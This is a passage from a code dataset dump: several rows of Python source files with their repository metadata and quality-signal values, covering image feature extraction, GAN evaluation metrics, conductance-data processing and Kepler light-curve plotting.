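import terrascript.data.fortios as short_path
import terrascript.data.fortinetdev.fortios as full_path

# Public names of the namespaced module should all be visible via the shim.
assert set(dir(short_path)) >= {n for n in dir(full_path) if not n.startswith("_")}
```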

Row 4
hexsha: c74c235bf2f7afe95304b548ce8f9769a76dbd90 | size: 37 | ext: py | lang: Python
max_stars_repo_path: purple/helpers.py | max_stars_repo_name: a8ksh4/purple | max_stars_repo_head_hexsha: 11460cc44cda7edf6f8fce5a5c841d4b04a47741 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 3 | max_stars_repo_stars_event_min_datetime: 2021-12-24T04:14:48.000Z | max_stars_repo_stars_event_max_datetime: 2022-01-19T16:48:14.000Z
max_issues_repo_path: purple/helpers.py | max_issues_repo_name: a8ksh4/purple | max_issues_repo_head_hexsha: 11460cc44cda7edf6f8fce5a5c841d4b04a47741 | max_issues_repo_licenses: ["MIT"] | max_issues_count: 1 | max_issues_repo_issues_event_min_datetime: 2022-01-25T05:32:21.000Z | max_issues_repo_issues_event_max_datetime: 2022-01-25T05:32:21.000Z
max_forks_repo_path: purple/helpers.py | max_forks_repo_name: a8ksh4/purple | max_forks_repo_head_hexsha: 11460cc44cda7edf6f8fce5a5c841d4b04a47741 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2022-01-19T00:41:04.000Z | max_forks_repo_forks_event_max_datetime: 2022-01-19T00:41:04.000Z
content:
```python
def key(index):
    return 1 << index
```
avg_line_length: 18.5 | max_line_length: 21 | alphanum_fraction: 0.621622
qsc quality-signal values (41 cols, schema order): 6 | 37 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.243243 | 37 | 2 | 21 | 18.5 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0
qsc flag values (41 cols, schema order): 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0
effective: 0 | hits: 6
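The one-liner in Row 4 builds single-bit masks; a quick illustrative use:

```python
# key(i) sets only bit i, so OR-ing keys composes a bitmask.
mask = key(0) | key(3)
assert mask == 0b1001
assert mask & key(3)         # bit 3 set
assert not (mask & key(2))   # bit 2 clear
```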

Row 5
hexsha: c771313e108f7daf29caacf358449193feac0774 | size: 5,972 | ext: py | lang: Python
max_stars_repo_path: utils.py | max_stars_repo_name: Avashist1998/Viola-Jones_Algorithm | max_stars_repo_head_hexsha: 0de21a22485b0f60fa03397ce6592dd2c7e0e3a5 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: utils.py | max_issues_repo_name: Avashist1998/Viola-Jones_Algorithm | max_issues_repo_head_hexsha: 0de21a22485b0f60fa03397ce6592dd2c7e0e3a5 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: utils.py | max_forks_repo_name: Avashist1998/Viola-Jones_Algorithm | max_forks_repo_head_hexsha: 0de21a22485b0f60fa03397ce6592dd2c7e0e3a5 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
# The goal of this file is to perform feature extraction using the Haar features.
# I'm hoping to define the functions in this file and worry about the rest later.
import cv2
import os
import glob
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import time

# Setting up and assigning the labels to the images.
# Get the base path of the directory.


def intergal_image(image):
    # Build the integral image: each pixel holds the sum of the rectangle
    # from the origin to that pixel.
    [row, col] = image.shape
    i_image = image.copy()
    for i in range(0, row):
        for j in range(0, col):
            i_image[i, j] = sum(sum(image[0:i+1, 0:j+1]))
    return i_image


def feature_extraction(image):
    image_copy = image.copy()
    feature = []
    [row, col] = image_copy.shape
    # Type 1 features (two vertical)
    for w in range(1, 5):
        for h in range(1, 9):
            for i in range(row-h+1):
                for j in range(col-2*w+1):
                    output = -2*image_copy[i+h-1,j+w-1] + 2*image_copy[i,j+w-1] + image_copy[i+h-1,j+2*w-1] + image_copy[i+h-1,j] + image_copy[i,j+2*w-1] - image_copy[i,j]
                    feature.append(output)
    print(len(feature))
    # Type 2 features (two horizontal)
    for h in range(1, 5):
        for w in range(1, 9):
            for i in range(row-2*h+1):
                for j in range(col-w+1):
                    output = 2*image_copy[i+h-1,j] + image_copy[i+2*h-1,j+w-1] + image_copy[i,j+w-1] - 2*image_copy[i+h-1,j+w-1] - image_copy[i+2*h-1,j] - image_copy[i,j]
                    feature.append(output)
    print(len(feature))
    # Type 3 features (three horizontal)
    for h in range(1, 3):
        for w in range(1, 9):
            for i in range(row-4*h+1):
                for j in range(col-w+1):
                    output = 2*image_copy[i+3*h-1,j+w-1] + 2*image_copy[i+h-1,j] - 2*image_copy[i+h-1,j+w-1] - 2*image_copy[i+3*h-1,j] - image_copy[i+4*h-1,j+w-1] + image_copy[i+4*h-1,j] - image_copy[i,j] + image_copy[i,j+w-1]
                    feature.append(output)
    print(len(feature))
    # Type 4 features (two vertical)
    for h in range(1, 9):
        for w in range(1, 3):
            for i in range(row-h+1):
                for j in range(col-4*w+1):
                    output = 2*image_copy[i,j+w-1] + 2*image_copy[i+h-1,j+3*w-1] - 2*image_copy[i,j+3*w-1] - 2*image_copy[i+h-1,j+w-1] - image_copy[i,j] + image_copy[i+h-1,j] - image_copy[i+h-1,j+4*w-1] + image_copy[i,j+4*w-1]
                    feature.append(output)
    print(len(feature))
    # Type 5 features (four)
    for h in range(1, 5):
        for w in range(1, 5):
            for i in range(row-2*h+1):
                for j in range(col-2*w+1):
                    output = image_copy[i,j] + 4*image_copy[i+h-1,j+w-1] - 2*image_copy[i,j+w-1] - 2*image_copy[i+h-1,j] + image[i+2*h-1,j+2*w-1] - 2*image_copy[i+h-1,j+2*w-1] + image_copy[i,j+2*w-1] - 2*image_copy[i+2*h-1,j+w-1] + image_copy[i+2*h-1,j]
                    feature.append(output)
    print(len(feature))
    return feature


# ---------------------------------------------------------------------------
base_path = os.getcwd()
train_faces_files = glob.glob(base_path + '/dataset/trainset/faces/*.png')
train_faces_files.sort()
train_non_faces_files = glob.glob(base_path + '/dataset/trainset/non-faces/*.png')
train_non_faces_files.sort()
data = np.array([[]])
t0 = time.time()
for names in train_faces_files:
    image = cv2.imread(names, cv2.IMREAD_GRAYSCALE)
    i_image = intergal_image(image)
    f = feature_extraction(i_image)
    data = np.append(data, f)
num_image = len(train_faces_files)
num_feature = int(len(data) / num_image)
data = np.resize(data, (num_image, num_feature))
temp_data = np.array([[]])
for names in train_non_faces_files:
    image = cv2.imread(names, cv2.IMREAD_GRAYSCALE)
    i_image = intergal_image(image)
    f = feature_extraction(i_image)
    temp_data = np.append(temp_data, f)
num_image = int(len(temp_data) / num_feature)
temp_data = np.resize(temp_data, (num_image, num_feature))
label = [1] * len(train_faces_files)
label_non_faces = [-1] * len(train_non_faces_files)
label = np.append(label, label_non_faces)
total_data = np.concatenate((data, temp_data), axis=0)
final = np.insert(total_data, num_feature, label, axis=1)
pd.DataFrame((final).astype(int)).to_csv(base_path + "/train_data.csv", header=None, index=None, float_format='%10.5f')
t1 = time.time()
print((t1 - t0) / 60)
# ---------------------------------------------------------------------------
# test set
train_faces_files = glob.glob(base_path + '/dataset/testset/faces/*.png')
train_faces_files.sort()
train_non_faces_files = glob.glob(base_path + '/dataset/testset/non-faces/*.png')
train_non_faces_files.sort()
data = np.array([[]])
t0 = time.time()
for names in train_faces_files:
    image = cv2.imread(names, cv2.IMREAD_GRAYSCALE)
    i_image = intergal_image(image)
    f = feature_extraction(i_image)
    data = np.append(data, f)
num_image = len(train_faces_files)
num_feature = int(len(data) / num_image)
data = np.resize(data, (num_image, num_feature))
temp_data = np.array([[]])
for names in train_non_faces_files:
    image = cv2.imread(names, cv2.IMREAD_GRAYSCALE)
    i_image = intergal_image(image)
    f = feature_extraction(i_image)
    temp_data = np.append(temp_data, f)
num_image = int(len(temp_data) / num_feature)
temp_data = np.resize(temp_data, (num_image, num_feature))
label = [1] * len(train_faces_files)
label_non_faces = [-1] * len(train_non_faces_files)
label = np.append(label, label_non_faces)
total_data = np.concatenate((data, temp_data), axis=0)
final = np.insert(total_data, num_feature, label, axis=1)
# final.tofile(base_path + 'train_data.csv', sep=',', format='%10.5f')
pd.DataFrame((final).astype(int)).to_csv(base_path + "/test_data.csv", header=None, index=None, float_format='%10.5f')
t1 = time.time()
print((t1 - t0) / 60)
# ---------------------------------------------------------------------------
```
avg_line_length: 43.591241 | max_line_length: 252 | alphanum_fraction: 0.611855
qsc quality-signal values (41 cols, schema order): 1,026 | 5,972 | 3.396686 | 0.11501 | 0.1033 | 0.1033 | 0.050502 | 0.814921 | 0.796844 | 0.792253 | 0.759254 | 0.713917 | 0.65538 | 0 | 0.033926 | 0.180676 | 5,972 | 136 | 253 | 43.911765 | 0.678316 | 0.136805 | 0 | 0.695652 | 0 | 0 | 0.031712 | 0.023735 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017391 | false | 0 | 0.06087 | 0 | 0.095652 | 0.06087
qsc flag values (41 cols, schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 6
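The intergal_image loop in Row 5 recomputes a full rectangular sum for every pixel, which is O(rows² · cols²). A vectorized equivalent (a sketch; for float images it matches the loop version, while integer inputs would differ because the loop writes sums back into the original dtype):

```python
import numpy as np

def integral_image_fast(image: np.ndarray) -> np.ndarray:
    # Cumulative sum down rows then across columns yields the same
    # summed-area table as the double loop in intergal_image.
    return image.cumsum(axis=0).cumsum(axis=1)

# Spot check against the loop version on a small float image:
# img = np.random.rand(8, 8)
# assert np.allclose(integral_image_fast(img), intergal_image(img))
```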

Row 6
hexsha: c77cd30812a9e70f01088285d7cc9ee58cd2135c | size: 160 | ext: py | lang: Python
max_stars_repo_path: Part_3_advanced/m08_abstract_protocol/abstract_class/homework_1_start/new_movies/datetime_utils.py | max_stars_repo_name: Mikma03/InfoShareacademy_Python_Courses | max_stars_repo_head_hexsha: 3df1008c8c92831bebf1625f960f25b39d6987e6 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: Part_3_advanced/m08_abstract_protocol/abstract_class/homework_1_start/new_movies/datetime_utils.py | max_issues_repo_name: Mikma03/InfoShareacademy_Python_Courses | max_issues_repo_head_hexsha: 3df1008c8c92831bebf1625f960f25b39d6987e6 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: Part_3_advanced/m08_abstract_protocol/abstract_class/homework_1_start/new_movies/datetime_utils.py | max_forks_repo_name: Mikma03/InfoShareacademy_Python_Courses | max_forks_repo_head_hexsha: 3df1008c8c92831bebf1625f960f25b39d6987e6 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
from dateutil.relativedelta import relativedelta  # type: ignore


def full_years_between_dates(later, earlier):
    return relativedelta(later, earlier).years
```
avg_line_length: 26.666667 | max_line_length: 64 | alphanum_fraction: 0.80625
qsc quality-signal values (41 cols, schema order): 19 | 160 | 6.631579 | 0.736842 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 160 | 5 | 65 | 32 | 0.9 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0
qsc flag values (41 cols, schema order): 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0
effective: 0 | hits: 6
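Usage of Row 6's helper (dates chosen arbitrarily): relativedelta truncates to whole years, so a span of 23 years and roughly 8 months reports 23.

```python
from datetime import date

assert full_years_between_dates(date(2024, 3, 1), date(2000, 6, 15)) == 23
```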

Row 7
hexsha: c782833324e4ef984f5e35fae938eed30c294c73 | size: 5,845 | ext: py | lang: Python
max_stars_repo_path: basic_analysis_module/drawDataProcessUtils.py | max_stars_repo_name: PeterPaaan/XMe_DataAnalysis | max_stars_repo_head_hexsha: 0f95cec3bc99ab8895133aea78ddedbd649c1834 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: basic_analysis_module/drawDataProcessUtils.py | max_issues_repo_name: PeterPaaan/XMe_DataAnalysis | max_issues_repo_head_hexsha: 0f95cec3bc99ab8895133aea78ddedbd649c1834 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: basic_analysis_module/drawDataProcessUtils.py | max_forks_repo_name: PeterPaaan/XMe_DataAnalysis | max_forks_repo_head_hexsha: 0f95cec3bc99ab8895133aea78ddedbd649c1834 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content (Chinese comments translated to English):
```python
# -*- coding: utf-8 -*-
# @Time : 2021/9/8 22:09
# @Author : Gang
# @File : drawDataProcessUtils.py
import numpy as np
from basicAnalysisConst import *
from myLog.MyLog import *


class DrawDataProcessUtils:
    logger = MyLog("DrawDataProcessUtils", BASEDIR)

    @classmethod
    def calculate_draw_data(cls, data, key_para):
        SAMPLING_RATE = key_para["le_Sampling_Rate"]
        STRETCHING_RATE = key_para["le_Stretching_Rate"]
        PIEZO_RATE = key_para["le_Piezo_Rate"]
        # TODO
        # Piezo support has not been added yet; the crux is that this conversion
        # factor depends on the piezo, which is a real pain.
        FACTOR = STRETCHING_RATE / SAMPLING_RATE
        log_G, start, zero, end, len_high, len_low, *_ = data
        ALL_TRACE_NUM = len(start)
        SELECT_TRACE_NUM = ALL_TRACE_NUM
        # datacut_temp=[[[(j-zero[i])*FACTOR,log_G[j]] for j in range(start[i],end[i])]for i in range(TRUE_NUM)]
        # Setting the formulation above aside for now.
        # Experiments showed the formulation above should be discarded; also, the
        # double-loop approach below can be partly replaced by the vectorized one.
        # distance=np.array([[(j-zero[i])*FACTOR for j in range(start[i],end[i])] for i in range(ALL_TRACE_NUM)])
        # conductance=np.array([[log_G[j] for j in range(start[i],end[i])] for i in range(ALL_TRACE_NUM)])
        # length=np.array([(len_low[i]-len_high[i])*FACTOR for i in range(ALL_TRACE_NUM)])
        distance = np.array([(np.arange(start[i], end[i]) - zero[i]) * FACTOR for i in range(ALL_TRACE_NUM)])
        conductance = np.array([log_G[np.arange(start[i], end[i])] for i in range(ALL_TRACE_NUM)])
        length = (len_low - len_high) * FACTOR
        distance_draw = distance.reshape(-1)
        conductance_draw = conductance.reshape(-1)
        return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM

    @classmethod
    def calculate_draw_data_with_select(cls, data, key_para):
        SAMPLING_RATE = key_para["le_Sampling_Rate"]
        STRETCHING_RATE = key_para["le_Stretching_Rate"]
        PIEZO_RATE = key_para["le_Piezo_Rate"]
        UPPER_LIMIT1 = key_para["le_Upper_Limit1"]
        UPPER_LIMIT2 = key_para["le_Upper_Limit2"]
        LOW_LIMIT1 = key_para["le_Low_Limit1"]
        LOW_LIMIT2 = key_para["le_Low_Limit2"]
        FACTOR = STRETCHING_RATE / SAMPLING_RATE
        log_G, start, zero, end, len_high, len_low, start1, end1, start2, end2 = data
        ALL_TRACE_NUM = len(start)
        # VALID_TRACE_INDEX=[]
        # for i in range(TRUE_NUM):
        #     temp1=(end1[i]-start1[i])*FACTOR
        #     temp2=(end2[i]-start2[i])*FACTOR
        #     if temp1>UPPER_LIMIT1 or temp1>UPPER_LIMIT2 or temp1<LOW_LIMIT1 or temp2<LOW_LIMIT2:
        #         continue
        #     VALID_TRACE_INDEX.append(i)
        # I think the version below is more efficient; it can be tested later.
        temp1 = (end1 - start1) * FACTOR
        temp2 = (end2 - start2) * FACTOR
        VALID_TRACE_INDEX = np.where(
            (temp1 >= LOW_LIMIT1) & (temp1 <= UPPER_LIMIT1)
            & (temp2 >= LOW_LIMIT2) & (temp2 <= UPPER_LIMIT2)
        )[0]
        distance = np.array([(np.arange(start[i], end[i]) - zero[i]) * FACTOR for i in VALID_TRACE_INDEX])
        conductance = np.array([log_G[np.arange(start[i], end[i])] for i in VALID_TRACE_INDEX])
        length = np.array([(len_low[i] - len_high[i]) * FACTOR for i in VALID_TRACE_INDEX])
        distance_draw = distance.reshape(-1)
        conductance_draw = conductance.reshape(-1)
        SELECT_TRACE_NUM = len(VALID_TRACE_INDEX)
        return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM

    @classmethod
    def calculate_draw_data_close(cls, data, key_para):
        SAMPLING_RATE = key_para["le_Sampling_Rate"]
        STRETCHING_RATE = key_para["le_Stretching_Rate"]
        PIEZO_RATE = key_para["le_Piezo_Rate"]
        # TODO
        # Piezo support has not been added yet; the crux is that this conversion
        # factor depends on the piezo, which is a real pain.
        FACTOR = STRETCHING_RATE / SAMPLING_RATE
        log_G, start, zero, end, len_high, len_low, *_ = data
        ALL_TRACE_NUM = len(start)
        SELECT_TRACE_NUM = ALL_TRACE_NUM
        distance = np.array([(zero[i] - np.arange(start[i], end[i])) * FACTOR for i in range(ALL_TRACE_NUM)])
        conductance = np.array([log_G[np.arange(start[i], end[i])] for i in range(ALL_TRACE_NUM)])
        length = (len_high - len_low) * FACTOR
        distance_draw = distance.reshape(-1)
        conductance_draw = conductance.reshape(-1)
        return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM

    @classmethod
    def calculate_draw_data_close_with_select(cls, data, key_para):
        SAMPLING_RATE = key_para["le_Sampling_Rate"]
        STRETCHING_RATE = key_para["le_Stretching_Rate"]
        PIEZO_RATE = key_para["le_Piezo_Rate"]
        UPPER_LIMIT1 = key_para["le_Upper_Limit1"]
        UPPER_LIMIT2 = key_para["le_Upper_Limit2"]
        LOW_LIMIT1 = key_para["le_Low_Limit1"]
        LOW_LIMIT2 = key_para["le_Low_Limit2"]
        FACTOR = STRETCHING_RATE / SAMPLING_RATE
        log_G, start, zero, end, len_high, len_low, start1, end1, start2, end2 = data
        ALL_TRACE_NUM = len(start)
        temp1 = (start1 - end1) * FACTOR
        temp2 = (start2 - end2) * FACTOR
        VALID_TRACE_INDEX = np.where(
            (temp1 >= LOW_LIMIT1) & (temp1 <= UPPER_LIMIT1) & (temp2 >= LOW_LIMIT2) & (temp2 <= UPPER_LIMIT2)
        )[0]
        distance = np.array([(zero[i] - np.arange(start[i], end[i])) * FACTOR for i in VALID_TRACE_INDEX])
        conductance = np.array([log_G[np.arange(start[i], end[i])] for i in VALID_TRACE_INDEX])
        length = np.array([(len_high[i] - len_low[i]) * FACTOR for i in VALID_TRACE_INDEX])
        distance_draw = distance.reshape(-1)
        conductance_draw = conductance.reshape(-1)
        SELECT_TRACE_NUM = len(VALID_TRACE_INDEX)
        return distance, conductance, length, distance_draw, conductance_draw, ALL_TRACE_NUM, SELECT_TRACE_NUM
```
avg_line_length: 44.280303 | max_line_length: 120 | alphanum_fraction: 0.656116
qsc quality-signal values (41 cols, schema order): 804 | 5,845 | 4.470149 | 0.118159 | 0.055648 | 0.050083 | 0.043406 | 0.840846 | 0.83222 | 0.825264 | 0.825264 | 0.825264 | 0.820812 | 0 | 0.019244 | 0.226518 | 5,845 | 131 | 121 | 44.618321 | 0.775713 | 0.155518 | 0 | 0.674699 | 0 | 0 | 0.065147 | 0 | 0 | 0 | 0 | 0.007634 | 0 | 1 | 0.048193 | false | 0 | 0.036145 | 0 | 0.156627 | 0
qsc flag values (41 cols, schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 6
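A sketch of driving Row 7's calculate_draw_data (synthetic arrays; shapes, units, and the key_para values are guesses based on how the method indexes its inputs, and it assumes the module's own myLog/basicAnalysisConst imports resolve):

```python
import numpy as np

# Two synthetic traces of equal length (400 samples each).
log_G = np.random.randn(1000)
start = np.array([0, 500])
zero = np.array([100, 600])
end = np.array([400, 900])
len_high = np.array([50, 550])
len_low = np.array([350, 850])
key_para = {"le_Sampling_Rate": 10000.0, "le_Stretching_Rate": 5.0, "le_Piezo_Rate": 1.0}

(distance, conductance, length, distance_draw,
 conductance_draw, n_all, n_sel) = DrawDataProcessUtils.calculate_draw_data(
    (log_G, start, zero, end, len_high, len_low), key_para)
```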

Row 8
hexsha: c7d682ee843c20b1c3e5a2587f5980f332c048d9 | size: 4,524 | ext: py | lang: Python
max_stars_repo_path: GAN/AC-BIGGAN-with-CIFAR10/utils/metrics.py | max_stars_repo_name: kiritowu/Deep-Learning | max_stars_repo_head_hexsha: baaec55a3b32f9e02ca3d834f1408f6736bdc170 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 3 | max_stars_repo_stars_event_min_datetime: 2021-12-16T02:26:10.000Z | max_stars_repo_stars_event_max_datetime: 2022-02-23T16:52:34.000Z
max_issues_repo_path: GAN/AC-BIGGAN-with-CIFAR10/utils/metrics.py | max_issues_repo_name: kiritowu/Deep-Learning | max_issues_repo_head_hexsha: baaec55a3b32f9e02ca3d834f1408f6736bdc170 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: GAN/AC-BIGGAN-with-CIFAR10/utils/metrics.py | max_forks_repo_name: kiritowu/Deep-Learning | max_forks_repo_head_hexsha: baaec55a3b32f9e02ca3d834f1408f6736bdc170 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
from typing import Optional

import torch
import torch.nn as nn
from torch.utils import data
from torchvision import transforms
import PIL.Image as Image

try:
    from torchmetrics.image import FID, IS
except ModuleNotFoundError:
    raise ModuleNotFoundError(
        "torchmetrics is not found. Please install it by running `pip install torchmetrics[image]`"
    )


class FID10k(FID):
    def __init__(self, device=None, **kwargs) -> None:
        super().__init__(**kwargs)
        if not device:
            device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.to(device)

    def interpolate229x229(self, batch):
        """Resize images to 299 x 299"""
        arr = []
        for img in batch:
            pil_img = transforms.ToPILImage()(img)
            resized_img = pil_img.resize((299, 299), Image.BILINEAR)
            img_tensor = transforms.ToTensor()(resized_img)
            arr.append(img_tensor)
        return torch.stack(arr)

    def evaluate10k(
        self,
        generator: nn.Module,
        real_data: data.Dataset,
        latent_dim: int,
        n_classes: int,
        batch_size: int = 100,
        sample_size: int = 10_000,
        inv_preprocessing=None,
    ) -> float:
        n_batch = (sample_size + batch_size - 1) // batch_size
        data_loader = data.DataLoader(real_data, batch_size=batch_size)
        data_iter = iter(data_loader)
        with torch.no_grad():
            for index in range(n_batch):
                latent_space = torch.normal(
                    0, 1, (batch_size, latent_dim), device=self._device, requires_grad=False)
                gen_labels = torch.randint(
                    0, n_classes, (batch_size,), device=self._device, requires_grad=False)
                real_img, _ = next(data_iter)
                fake_img = generator(latent_space, gen_labels)
                if inv_preprocessing:
                    real_img = inv_preprocessing(real_img)
                    fake_img = inv_preprocessing(fake_img)
                uint_real_img = (self.interpolate229x229(real_img) * 255).type(torch.uint8)
                uint_fake_img = (self.interpolate229x229(fake_img) * 255).type(torch.uint8)
                uint_real_img = uint_real_img.to(torch.device("cuda" if torch.cuda.is_available() else "cpu"))
                uint_fake_img = uint_fake_img.to(torch.device("cuda" if torch.cuda.is_available() else "cpu"))
                self.update(uint_real_img, real=True)
                self.update(uint_fake_img, real=False)
        return self.compute().cpu().item()


class IS10k(IS):
    def __init__(self, device=None, **kwargs) -> None:
        super().__init__(**kwargs)
        if not device:
            device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.to(device)

    def interpolate229x229(self, batch):
        """Resize images to 299 x 299"""
        arr = []
        for img in batch:
            pil_img = transforms.ToPILImage()(img)
            resized_img = pil_img.resize((299, 299), Image.BILINEAR)
            img_tensor = transforms.ToTensor()(resized_img)
            arr.append(img_tensor)
        return torch.stack(arr)

    def evaluate10k(
        self,
        generator: nn.Module,
        latent_dim: int,
        n_classes: int,
        batch_size: int = 100,
        sample_size: int = 10_000,
        inv_preprocessing=None,
    ) -> float:
        n_batch = (sample_size + batch_size - 1) // batch_size
        with torch.no_grad():
            for index in range(n_batch):
                latent_space = torch.normal(
                    0, 1, (batch_size, latent_dim), device=self._device, requires_grad=False)
                gen_labels = torch.randint(
                    0, n_classes, (batch_size,), device=self._device, requires_grad=False)
                fake_img = generator(latent_space, gen_labels)
                if inv_preprocessing:
                    fake_img = inv_preprocessing(fake_img)
                uint_fake_img = (self.interpolate229x229(fake_img) * 255).type(torch.uint8)
                uint_fake_img = uint_fake_img.to(torch.device("cuda" if torch.cuda.is_available() else "cpu"))
                self.update(uint_fake_img)
        return self.compute()[0].cpu().item()
```
avg_line_length: 36.483871 | max_line_length: 111 | alphanum_fraction: 0.571618
qsc quality-signal values (41 cols, schema order): 521 | 4,524 | 4.712092 | 0.205374 | 0.045621 | 0.035845 | 0.034623 | 0.765377 | 0.753971 | 0.753971 | 0.727902 | 0.719756 | 0.719756 | 0 | 0.032695 | 0.330681 | 4,524 | 124 | 112 | 36.483871 | 0.778071 | 0.011715 | 0 | 0.723404 | 0 | 0 | 0.029754 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.074468 | 0 | 0.202128 | 0
qsc flag values (41 cols, schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 6
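Illustrative use of Row 8's FID10k (the generator and dataset are placeholders, as are latent_dim and n_classes; nothing here comes from the repo itself):

```python
fid = FID10k()
score = fid.evaluate10k(
    generator=my_generator,      # hypothetical nn.Module: (z, labels) -> images
    real_data=cifar10_testset,   # hypothetical Dataset yielding (img, label)
    latent_dim=128,
    n_classes=10,
)
print(f"FID over 10k samples: {score:.2f}")
```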

Row 9
hexsha: 40078786194afce550cd4853bc8215e656238d87 | size: 17,333 | ext: py | lang: Python
max_stars_repo_path: pyke/kepplot.py | max_stars_repo_name: ecalifornica/pyke | max_stars_repo_head_hexsha: 6a3fcc0513cf012044e4420cc4d17064e582d142 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: pyke/kepplot.py | max_issues_repo_name: ecalifornica/pyke | max_issues_repo_head_hexsha: 6a3fcc0513cf012044e4420cc4d17064e582d142 | max_issues_repo_licenses: ["MIT"] | max_issues_count: 1 | max_issues_repo_issues_event_min_datetime: 2017-07-25T19:23:05.000Z | max_issues_repo_issues_event_max_datetime: 2017-07-25T19:23:05.000Z
max_forks_repo_path: pyke/kepplot.py | max_forks_repo_name: mirca/PyKE | max_forks_repo_head_hexsha: 6a3fcc0513cf012044e4420cc4d17064e582d142 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
from . import kepmsg, kepstat
import math
import numpy as np
from matplotlib import pyplot as plt
def location(shape):
"""shape the window, enforce absolute scaling, rotate the labels"""
# position first axes inside the plotting window
ax = plt.axes(shape)
# force tick labels to be absolute rather than relative
plt.gca().xaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))
plt.gca().yaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))
ax.yaxis.set_major_locator(plt.MaxNLocator(5))
# rotate y labels by 90 deg
labels = ax.get_yticklabels()
return ax
def plot1d(x, y, cadence, lcolor, lwidth, fcolor, falpha, underfill):
"""plot a 1d distribution"""
# pad first and last points in case a fill is required
x = np.insert(x, [0], [x[0]])
x = np.append(x, [x[-1]])
y = np.insert(y, [0], [-1.0e10])
y = np.append(y, -1.0e10)
# plot data so that data gaps are not spanned by a line
ltime = np.array([], dtype='float64')
ldata = np.array([], dtype='float32')
for i in range(1, len(x)-1):
if x[i] - x[i - 1] < 2.0 * cadence / 86400:
ltime = np.append(ltime, x[i])
